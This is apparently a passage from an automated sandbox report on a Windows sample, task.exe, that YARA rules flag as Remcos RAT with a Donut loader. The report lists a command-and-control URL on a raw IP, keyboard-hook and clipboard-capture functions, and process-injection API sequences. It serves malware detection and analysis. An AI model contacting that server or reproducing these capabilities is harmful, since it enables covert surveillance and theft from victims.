                  Source: task.exe, 00000018.00000002.1683843310.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: svchost.exe, 0000001F.00000002.1764768294.000000000330C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.1764466512.0000000000C7C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.2169208927.000001BE856B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2171115892.000001BE8295E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna
                  Source: svchost.exe, 0000001F.00000002.1764768294.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnakernelbasentdllkernel32GetProcessMitigati
                  Source: svchost.exe, 00000020.00000002.2171115892.000001BE8295E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnas
                  Source: svchost.exe, 0000001F.00000002.1764466512.0000000000C7C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnax
                  Source: svchost.exe, 00000020.00000003.2169208927.000001BE856B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnaymb
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: msedge.exe, 00000026.00000002.1935253683.00001C0003170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
                  Source: svchost.exe, 0000001F.00000003.1695689800.000000000339F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                  Source: svchost.exe, 0000001F.00000003.1695689800.000000000339F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: task.exe, 00000018.00000003.1666212847.0000000002134000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683160704.0000000000AFD000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1665557177.0000000002131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: task.exe, 00000018.00000003.1666212847.0000000002134000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1665557177.0000000002131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: task.exe, 00000018.00000003.1666212847.0000000002134000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1665557177.0000000002131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: task.exe, 00000018.00000002.1685293190.000000000212D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683033412.000000000212C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683064834.000000000212C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000018.00000003.1683263384.000000000212C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_i__
                  Source: task.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: msedge.exe, 00000026.00000002.1935253683.00001C0003170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: task.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: task.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 179.43.171.196:443 -> 192.168.2.9:49740 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\task.exeCode function: 22_2_00069E55 SetWindowsHookExA 0000000D,00069E3E,0000000022_2_00069E55
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B2B5 OpenClipboard,GetClipboardData,CloseClipboard,22_2_0006B2B5
                  Source: C:\Users\user\task.exeCode function: 22_2_00074C52 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,22_2_00074C52
                  Source: C:\Users\user\task.exeCode function: 24_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_0040987A
                  Source: C:\Users\user\task.exeCode function: 24_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004098E2
                  Source: C:\Users\user\task.exeCode function: 22_2_0006B2B5 OpenClipboard,GetClipboardData,CloseClipboard,22_2_0006B2B5
                  Source: C:\Users\user\task.exeCode function: 22_2_00069F7D GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,22_2_00069F7D
                  Source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_655acf23-d
                  Source: task.exe, 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_d8b5a7e2-6
                  Source: Yara matchFile source: 31.3.svchost.exe.5430000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.3.task.exe.2b50000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.3.task.exe.2d70000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.3.svchost.exe.5430000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.3.task.exe.2d70000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.3.svchost.exe.5430000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.3.svchost.exe.5650000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 7340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2148, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\task.exeCode function: 22_2_0007AC11 SystemParametersInfoW,22_2_0007AC11

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: C:\Users\user\task.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMemory allocated: 75760000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\task.exeMemory allocated: 75760000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\task.exeMemory allocated: 75760000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DC7F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,8_2_6C8DC7F0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DC910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,8_2_6C8DC910
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7C7F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,22_2_6FE7C7F0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7C910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,22_2_6FE7C910
                  Source: C:\Users\user\task.exeCode function: 22_2_00076447 GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,22_2_00076447
                  Source: C:\Users\user\task.exeCode function: 22_2_00071673 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,22_2_00071673
                  Source: C:\Users\user\task.exeCode function: 22_2_00079CD4 OpenProcess,NtSuspendProcess,CloseHandle,22_2_00079CD4
                  Source: C:\Users\user\task.exeCode function: 22_2_00079D00 OpenProcess,NtResumeProcess,CloseHandle,22_2_00079D00
                  Source: C:\Users\user\task.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Users\user\task.exeCode function: 24_2_00401806 NtdllDefWindowProc_W,24_2_00401806
                  Source: C:\Users\user\task.exeCode function: 24_2_004018C0 NtdllDefWindowProc_W,24_2_004018C0
                  Source: C:\Users\user\task.exeCode function: 22_2_00074B45 ExitWindowsEx,LoadLibraryA,GetProcAddress,22_2_00074B45
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\434f23.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{0028494D-9E28-4DD9-A336-17E8D634DF88}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI509A.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI509A.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_3_05095E988_3_05095E98
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_3_050929E08_3_050929E0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_3_050950C08_3_050950C0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_3_05099AE08_3_05099AE0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8F6CC18_2_6C8F6CC1
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8FED3B8_2_6C8FED3B
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8FE8908_2_6C8FE890
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DE9708_2_6C8DE970
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DE4808_2_6C8DE480
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8E25708_2_6C8E2570
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8E87C08_2_6C8E87C0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8E67008_2_6C8E6700
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8E82908_2_6C8E8290
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8EBDA08_2_6C8EBDA0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8D7F418_2_6C8D7F41
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8EB8F08_2_6C8EB8F0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8E39608_2_6C8E3960
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C903AF18_2_6C903AF1
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DFB308_2_6C8DFB30
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DD1708_2_6C8DD170
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_026482738_2_02648273
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE9ED3B22_2_6FE9ED3B
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7E97022_2_6FE7E970
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE9E89022_2_6FE9E890
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE887C022_2_6FE887C0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE8670022_2_6FE86700
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE8257022_2_6FE82570
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7E48022_2_6FE7E480
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE8829022_2_6FE88290
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE77F4122_2_6FE77F41
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE8BDA022_2_6FE8BDA0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7FB3022_2_6FE7FB30
                  Source: C:\Users\user\task.exeCode function: 22_2_6FEA3AF122_2_6FEA3AF1
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE8396022_2_6FE83960
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE8B8F022_2_6FE8B8F0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7D17022_2_6FE7D170
                  Source: C:\Users\user\task.exeCode function: 22_2_0008521922_2_00085219
                  Source: C:\Users\user\task.exeCode function: 22_2_0009128C22_2_0009128C
                  Source: C:\Users\user\task.exeCode function: 22_2_000942B022_2_000942B0
                  Source: C:\Users\user\task.exeCode function: 22_2_000722DB22_2_000722DB
                  Source: C:\Users\user\task.exeCode function: 22_2_0009730722_2_00097307
                  Source: C:\Users\user\task.exeCode function: 22_2_0007D36722_2_0007D367
                  Source: C:\Users\user\task.exeCode function: 22_2_0009D4CC22_2_0009D4CC
                  Source: C:\Users\user\task.exeCode function: 22_2_000965BE22_2_000965BE
                  Source: C:\Users\user\task.exeCode function: 22_2_000A167022_2_000A1670
                  Source: C:\Users\user\task.exeCode function: 22_2_000AB68022_2_000AB680
                  Source: C:\Users\user\task.exeCode function: 22_2_0009D6FB22_2_0009D6FB
                  Source: C:\Users\user\task.exeCode function: 22_2_0009773C22_2_0009773C
                  Source: C:\Users\user\task.exeCode function: 22_2_000938AE22_2_000938AE
                  Source: C:\Users\user\task.exeCode function: 22_2_000858B722_2_000858B7
                  Source: C:\Users\user\task.exeCode function: 22_2_0009D92A22_2_0009D92A
                  Source: C:\Users\user\task.exeCode function: 22_2_000859FA22_2_000859FA
                  Source: C:\Users\user\task.exeCode function: 22_2_00096ABA22_2_00096ABA
                  Source: C:\Users\user\task.exeCode function: 22_2_000ABD2922_2_000ABD29
                  Source: C:\Users\user\task.exeCode function: 22_2_00084D2222_2_00084D22
                  Source: C:\Users\user\task.exeCode function: 22_2_0007BDB022_2_0007BDB0
                  Source: C:\Users\user\task.exeCode function: 22_2_00096ED222_2_00096ED2
                  Source: C:\Users\user\task.exeCode function: 22_2_000AFF0422_2_000AFF04
                  Source: C:\Users\user\task.exeCode function: 22_2_000B3FD022_2_000B3FD0
                  Source: C:\Users\user\task.exeCode function: 22_2_1001719422_2_10017194
                  Source: C:\Users\user\task.exeCode function: 22_2_1000B5C122_2_1000B5C1
                  Source: C:\Users\user\task.exeCode function: 22_2_0257532222_2_02575322
                  Source: C:\Users\user\task.exeCode function: 22_2_0258D39522_2_0258D395
                  Source: C:\Users\user\task.exeCode function: 22_2_0258602922_2_02586029
                  Source: C:\Users\user\task.exeCode function: 22_2_025910DB22_2_025910DB
                  Source: C:\Users\user\task.exeCode function: 22_2_0259B0EB22_2_0259B0EB
                  Source: C:\Users\user\task.exeCode function: 22_2_0258D16622_2_0258D166
                  Source: C:\Users\user\task.exeCode function: 22_2_0257478D22_2_0257478D
                  Source: C:\Users\user\task.exeCode function: 22_2_0257546522_2_02575465
                  Source: C:\Users\user\task.exeCode function: 22_2_0256B81B22_2_0256B81B
                  Source: C:\Users\user\task.exeCode function: 22_2_0258CF3722_2_0258CF37
                  Source: C:\Users\user\task.exeCode function: 22_2_02580CF722_2_02580CF7
                  Source: C:\Users\user\task.exeCode function: 22_2_02574C8422_2_02574C84
                  Source: C:\Users\user\task.exeCode function: 22_2_02583D1B22_2_02583D1B
                  Source: C:\Users\user\task.exeCode function: 22_2_0256CDD222_2_0256CDD2
                  Source: C:\Users\user\task.exeCode function: 24_2_0044B04024_2_0044B040
                  Source: C:\Users\user\task.exeCode function: 24_2_0043610D24_2_0043610D
                  Source: C:\Users\user\task.exeCode function: 24_2_0044731024_2_00447310
                  Source: C:\Users\user\task.exeCode function: 24_2_0044A49024_2_0044A490
                  Source: C:\Users\user\task.exeCode function: 24_2_0040755A24_2_0040755A
                  Source: C:\Users\user\task.exeCode function: 24_2_0043C56024_2_0043C560
                  Source: C:\Users\user\task.exeCode function: 24_2_0044B61024_2_0044B610
                  Source: C:\Users\user\task.exeCode function: 24_2_0044D6C024_2_0044D6C0
                  Source: C:\Users\user\task.exeCode function: 24_2_004476F024_2_004476F0
                  Source: C:\Users\user\task.exeCode function: 24_2_0044B87024_2_0044B870
                  Source: C:\Users\user\task.exeCode function: 24_2_0044081D24_2_0044081D
                  Source: C:\Users\user\task.exeCode function: 24_2_0041495724_2_00414957
                  Source: C:\Users\user\task.exeCode function: 24_2_004079EE24_2_004079EE
                  Source: C:\Users\user\task.exeCode function: 24_2_00407AEB24_2_00407AEB
                  Source: C:\Users\user\task.exeCode function: 24_2_0044AA8024_2_0044AA80
                  Source: C:\Users\user\task.exeCode function: 24_2_00412AA924_2_00412AA9
                  Source: C:\Users\user\task.exeCode function: 24_2_00404B7424_2_00404B74
                  Source: C:\Users\user\task.exeCode function: 24_2_00404B0324_2_00404B03
                  Source: C:\Users\user\task.exeCode function: 24_2_0044BBD824_2_0044BBD8
                  Source: C:\Users\user\task.exeCode function: 24_2_00404BE524_2_00404BE5
                  Source: C:\Users\user\task.exeCode function: 24_2_00404C7624_2_00404C76
                  Source: C:\Users\user\task.exeCode function: 24_2_00415CFE24_2_00415CFE
                  Source: C:\Users\user\task.exeCode function: 24_2_00416D7224_2_00416D72
                  Source: C:\Users\user\task.exeCode function: 24_2_00446D3024_2_00446D30
                  Source: C:\Users\user\task.exeCode function: 24_2_00446D8B24_2_00446D8B
                  Source: C:\Users\user\task.exeCode function: 24_2_00406E8F24_2_00406E8F
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmp 796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: String function: 6C8F12B0 appears 36 times
                  Source: C:\Users\user\task.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\task.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\task.exeCode function: String function: 6FE912B0 appears 36 times
                  Source: C:\Users\user\task.exeCode function: String function: 000620BD appears 46 times
                  Source: C:\Users\user\task.exeCode function: String function: 00092100 appears 42 times
                  Source: C:\Users\user\task.exeCode function: String function: 02581B6B appears 41 times
                  Source: C:\Users\user\task.exeCode function: String function: 0258224B appears 47 times
                  Source: C:\Users\user\task.exeCode function: String function: 00061E82 appears 33 times
                  Source: C:\Users\user\task.exeCode function: String function: 000927E0 appears 54 times
                  Source: C:\Users\user\task.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\task.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976
                  Source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
